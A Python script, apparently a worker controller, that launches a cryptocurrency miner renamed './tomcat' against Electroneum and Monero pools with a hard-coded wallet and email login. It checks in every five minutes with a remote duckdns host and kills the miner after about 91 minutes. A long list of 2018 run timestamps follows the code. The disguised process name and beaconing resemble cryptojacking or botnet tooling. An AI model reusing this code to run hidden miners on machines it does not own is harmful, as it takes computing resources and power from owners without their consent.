import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:53:05.874700
#2018-02-17 16:41:05.138108
#2018-02-17 18:28:03.861053
#2018-02-17 20:17:03.804612
#2018-02-17 22:04:01.372277
#2018-02-17 23:47:06.838717
#2018-02-18 01:38:06.458441
#2018-02-18 03:25:04.475794
#2018-02-18 05:12:07.054132
#2018-02-18 07:04:05.991366
#2018-02-18 08:52:06.969995
#2018-02-18 10:39:07.901637
#2018-02-18 12:24:04.424176
#2018-02-18 14:11:07.012632
#2018-02-18 16:01:06.158905
#2018-02-18 17:50:08.172819
#2018-02-18 19:37:01.312052
#2018-02-18 21:22:07.363538
#2018-02-18 23:11:07.368363
#2018-02-19 00:57:07.172960
#2018-02-19 02:44:03.675753
#2018-02-19 04:31:05.831013
#2018-02-19 06:16:05.729678
#2018-02-19 08:04:07.208836
#2018-02-19 09:54:04.484482
#2018-02-19 11:43:06.732667
#2018-02-19 13:30:08.574603
#2018-02-19 15:19:07.819064
#2018-02-19 17:06:01.477017
#2018-02-19 18:53:06.709939
#2018-02-19 20:42:01.383107
#2018-02-19 22:28:05.081601
#2018-02-20 00:14:05.391271
#2018-02-20 02:01:03.894755
#2018-02-20 03:51:07.815460
#2018-02-20 05:35:04.648112
#2018-02-20 07:19:04.271325
#2018-02-20 09:05:08.968320
#2018-02-20 10:48:08.229097
#2018-02-20 12:35:08.736910
#2018-02-20 14:20:07.858531
#2018-02-20 16:06:07.078094
#2018-02-20 17:52:09.520995
#2018-02-20 19:42:08.973999
#2018-02-20 21:28:04.194000
#2018-02-20 23:11:06.961849
#2018-02-21 00:57:01.999357
#2018-02-21 02:44:08.535220
#2018-02-21 04:34:04.146433
#2018-02-21 06:21:05.866893
#2018-02-21 08:06:01.990111
#2018-02-21 09:51:08.089393
#2018-02-21 11:40:07.097702
#2018-02-21 13:29:07.094184
#2018-02-21 15:14:01.387752
#2018-02-21 17:03:07.175148
#2018-02-21 18:50:03.011078
#2018-02-21 20:40:04.414989
#2018-02-21 22:25:07.033205
#2018-02-22 00:15:09.546797
#2018-02-22 02:03:05.936768
#2018-02-22 03:48:06.753413
#2018-02-22 05:34:07.741868
#2018-02-22 07:19:05.197124
#2018-02-22 09:06:08.595715
#2018-02-22 10:54:09.699222
#2018-02-22 12:40:07.777225
#2018-02-22 14:26:05.576571
#2018-02-22 16:14:02.048986
#2018-02-22 17:59:06.066921
#2018-02-22 19:48:07.158620
#2018-02-22 21:38:06.752061
#2018-02-22 23:25:08.003239
#2018-02-23 01:12:02.123451
#2018-02-23 02:58:06.034577
#2018-02-23 04:44:01.928528
#2018-02-23 06:33:03.680488
#2018-02-23 08:22:03.967868
#2018-02-23 10:38:06.762447
#2018-02-23 12:32:09.328213
#2018-02-23 14:20:10.531359
#2018-02-23 16:11:01.619985
#2018-02-23 17:57:08.551454
#2018-02-23 19:43:06.071627
#2018-02-23 21:26:07.552521
#2018-02-23 23:13:07.809720
#2018-02-24 01:03:04.983252
#2018-02-24 02:55:04.438221
#2018-02-24 04:45:02.122407
#2018-02-24 06:29:07.873187
#2018-02-24 08:18:02.038223
#2018-02-24 10:02:06.199447
#2018-02-24 12:00:05.924057
#2018-02-24 13:47:03.465813
#2018-02-24 15:35:07.599657
#2018-02-24 17:28:06.412638
#2018-02-24 19:15:09.959148
#2018-02-24 21:02:06.991688
#2018-02-24 23:35:06.996117
#2018-02-25 03:48:01.393559
#2018-02-25 06:35:06.898663
#2018-02-25 11:36:02.159173
#2018-02-25 13:17:01.402239
#2018-02-25 14:50:03.808037